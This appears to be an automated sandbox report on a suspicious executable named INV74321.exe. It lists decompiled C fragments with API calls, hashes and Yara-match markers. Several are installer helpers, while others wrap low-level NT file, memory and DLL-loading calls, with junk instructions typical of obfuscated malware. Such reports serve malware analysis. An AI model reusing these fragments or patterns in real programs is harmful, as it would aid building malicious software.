                                                          			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                          				int _v8;
                                                          				long _t21;
                                                          				long _t24;
                                                          				char* _t30;
                                                          
                                                          				asm("sbb eax, eax");
                                                          				_v8 = 0x400;
                                                          				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                          				_t30 = _a16;
                                                          				if(_t21 != 0) {
                                                          					L4:
                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                          				} else {
                                                          					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                          					_t21 = RegCloseKey(_a20);
                                                          					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                          						goto L4;
                                                          					}
                                                          				}
                                                          				return _t21;
                                                          			}








                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,GHFGHFGHFDGDFGDFg,0042A070,?,?,?,00000002,GHFGHFGHFDGDFGDFg,?,00406293,80000002), ref: 00406024
                                                          • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,?,0042A070), ref: 0040602F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: GHFGHFGHFDGDFGDFg
                                                          • API String ID: 3356406503-2848008697
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405796(CHAR* _a4) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				int _t7;
                                                          
                                                          				0x42c098->cb = 0x44;
                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
                                                          				if(_t7 != 0) {
                                                          					CloseHandle(_v20.hThread);
                                                          					return _v20.hProcess;
                                                          				}
                                                          				return _t7;
                                                          			}






                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                          Strings
                                                          • Error launching installer, xrefs: 004057A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00403875() {
                                                          				void* _t2;
                                                          				void* _t3;
                                                          				void* _t6;
                                                          				void* _t8;
                                                          
                                                          				_t8 =  *0x429854;
                                                          				_t3 = E0040385A(_t2, 0);
                                                          				if(_t8 != 0) {
                                                          					do {
                                                          						_t6 = _t8;
                                                          						_t8 =  *_t8;
                                                          						FreeLibrary( *(_t6 + 8));
                                                          						_t3 = GlobalFree(_t6);
                                                          					} while (_t8 != 0);
                                                          				}
                                                          				 *0x429854 =  *0x429854 & 0x00000000;
                                                          				return _t3;
                                                          			}








                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                          • GlobalFree.KERNEL32 ref: 00403896
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3916508600
                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405AD6(char* _a4) {
                                                          				char* _t3;
                                                          				char* _t5;
                                                          
                                                          				_t5 = _a4;
                                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                          				while( *_t3 != 0x5c) {
                                                          					_t3 = CharPrevA(_t5, _t3);
                                                          					if(_t3 > _t5) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                          				return  &(_t3[1]);
                                                          			}






                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INV74321.exe,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405ADC
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INV74321.exe,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405AEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1669384263
                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                          				int _v8;
                                                          				int _t12;
                                                          				int _t14;
                                                          				int _t15;
                                                          				CHAR* _t17;
                                                          				CHAR* _t27;
                                                          
                                                          				_t12 = lstrlenA(_a8);
                                                          				_t27 = _a4;
                                                          				_v8 = _t12;
                                                          				while(lstrlenA(_t27) >= _v8) {
                                                          					_t14 = _v8;
                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                          					if(_t15 == 0) {
                                                          						_t17 = _t27;
                                                          					} else {
                                                          						_t27 = CharNextA(_t27);
                                                          						continue;
                                                          					}
                                                          					L5:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = 0;
                                                          				goto L5;
                                                          			}










                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                          • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 37%
                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                          				void* _t18;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          
                                                          				_t13 = _a4;
                                                          				_t28 = _a4 + 0xc48;
                                                          				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                          				_t6 =  &_a32; // 0x413d52
                                                          				_t12 =  &_a8; // 0x413d52
                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                          				return _t18;
                                                          			}

                                                          APIs
                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: R=A$R=A
                                                          • API String ID: 2738559852-3742021989
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E0041826C(signed int __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                          				void* _t21;
                                                          				void* _t32;
                                                          				intOrPtr* _t33;
                                                          				void* _t35;
                                                          
                                                          				_t31 = __edi +  *((intOrPtr*)(__eax * 2 - 0x1374aac1));
                                                          				_t16 = _a4;
                                                          				_t33 = _a4 + 0xc48;
                                                          				E00418DC0(_t31, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                          				_t8 =  &_a32; // 0x413d52
                                                          				_t14 =  &_a8; // 0x413d52
                                                          				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t32, _t35); // executed
                                                          				return _t21;
                                                          			}

                                                          APIs
                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: R=A$R=A
                                                          • API String ID: 2738559852-3742021989
                                                          • Opcode ID: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                          • Instruction ID: 06aea5ea9b62c8f08385dfefd69c4e159e0f69636af22cb6cae9cca6d72240a1
                                                          • Opcode Fuzzy Hash: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                          • Instruction Fuzzy Hash: E9F0BDB6200104AFCB14DF89DC80DEB77A9FF8C354F158649FA1D97251DA34E951CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00409B20(void* _a4, intOrPtr _a8) {
                                                          				char* _v8;
                                                          				struct _EXCEPTION_RECORD _v12;
                                                          				struct _OBJDIR_INFORMATION _v16;
                                                          				char _v536;
                                                          				void* _t15;
                                                          				struct _OBJDIR_INFORMATION _t17;
                                                          				struct _OBJDIR_INFORMATION _t18;
                                                          				void* _t30;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          
                                                          				_v8 =  &_v536;
                                                          				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                          				_t31 = _t30 + 0xc;
                                                          				if(_t15 != 0) {
                                                          					_t17 = E0041AF70(__eflags, _v8);
                                                          					_t32 = _t31 + 4;
                                                          					__eflags = _t17;
                                                          					if(_t17 != 0) {
                                                          						E0041B1F0( &_v12, 0);
                                                          						_t32 = _t32 + 8;
                                                          					}
                                                          					_t18 = E00419300(_v8);
                                                          					_v16 = _t18;
                                                          					__eflags = _t18;
                                                          					if(_t18 == 0) {
                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                          						return _v16;
                                                          					}
                                                          					return _t18;
                                                          				} else {
                                                          					return _t15;
                                                          				}
                                                          			}

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E004181BA(intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                                          				long _t21;
                                                          				void* _t32;
                                                          
                                                          				asm("int1");
                                                          				asm("das");
                                                          				asm("aad 0x5a");
                                                          				asm("sbb edx, [ebp-0x75]");
                                                          				_t15 = _a8;
                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                          				E00418DC0(_t32, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
                                                          				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                          				return _t21;
                                                          			}

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: b410dabae7d3bf98101e7d50e7c9945d6d7e0980f008fda0bfad65246244ee13
                                                          • Instruction ID: e51cda5be7c0432cde36c699c22da099f53b33a42e32be49aa857797f1c1653f
                                                          • Opcode Fuzzy Hash: b410dabae7d3bf98101e7d50e7c9945d6d7e0980f008fda0bfad65246244ee13
                                                          • Instruction Fuzzy Hash: 8901A4B2240108AFCB18CF99DC85DEB77E9AF8C754F158658FA0D97241C634E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                          				long _t21;
                                                          				void* _t31;
                                                          
                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                          				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                          				return _t21;
                                                          			}

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E004182EA(void* __eax, void* __ebx, char _a1, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
                                                          				void* _t9;
                                                          				char* _t29;
                                                          
                                                          				_t9 = __eax - 0xf5;
                                                          				asm("popfd");
                                                          				_t29 =  &_a1;
                                                          				if (_t29 < 0) goto L3;
                                                          				_push(_t29);
                                                          			}

                                                          APIs
                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 99e770959f311ce0b3c1f0f640b19380c9e3587b099295d67f90f48bce30e7bd
                                                          • Instruction ID: b43b2f1aff78f2368a5bd9cbf9cc39af3ea3ae8a63b3d1812f99d6b7abf77256
                                                          • Opcode Fuzzy Hash: 99e770959f311ce0b3c1f0f640b19380c9e3587b099295d67f90f48bce30e7bd
                                                          • Instruction Fuzzy Hash: 0CF082B6200218ABD710EFD9DC80EEB736DEF88324F14865DFA5C9B241CA31E91187A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                          				long _t14;
                                                          				void* _t21;
                                                          
                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                          				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                          				return _t14;
                                                          			}

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                          • Instruction ID: d64984979b305ccb5e35b35acd27a0667bc32fad1515e89ea6ca52b66f6c8e22
                                                          • Opcode Fuzzy Hash: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                          • Instruction Fuzzy Hash: FC90026260101502D20171595404616004AD7D0391FA1C076A5054555ECA6589A3F171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                          • Instruction ID: fc8cc9ee8be9c98fb4dd9e738ee057c4202b2c6b9eced3574650befb9a06e9f7
                                                          • Opcode Fuzzy Hash: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                          • Instruction Fuzzy Hash: 6190027220101413D211615955047070049D7D0391FA1C466A4454558D96968963F161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                          • Instruction ID: 95f6909961eea0f216a17a31d6ae4d59bea172290c0c8aafaae842ca9f112f4a
                                                          • Opcode Fuzzy Hash: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                          • Instruction Fuzzy Hash: AC900262242051525645B15954045074046E7E03917A1C066A5444950C85669867E661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches

                                                          C-Code - Quality: 82%
                                                          			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                          				char _v67;
                                                          				char _v68;
                                                          				void* _t12;
                                                          				intOrPtr* _t13;
                                                          				int _t14;
                                                          				long _t21;
                                                          				intOrPtr* _t25;
                                                          				void* _t26;
                                                          				void* _t30;
                                                          
                                                          				_t30 = __eflags;
                                                          				_v68 = 0;
                                                          				L00419D20( &_v67, 0, 0x3f);
                                                          				E0041A900( &_v68, 3);
                                                          				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
                                                          				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                          				_t25 = _t13;
                                                          				if(_t25 != 0) {
                                                          					_t21 = _a8;
                                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                          					_t32 = _t14;
                                                          					if(_t14 == 0) {
                                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                          					}
                                                          					return _t14;
                                                          				}
                                                          				return _t13;
                                                          			}













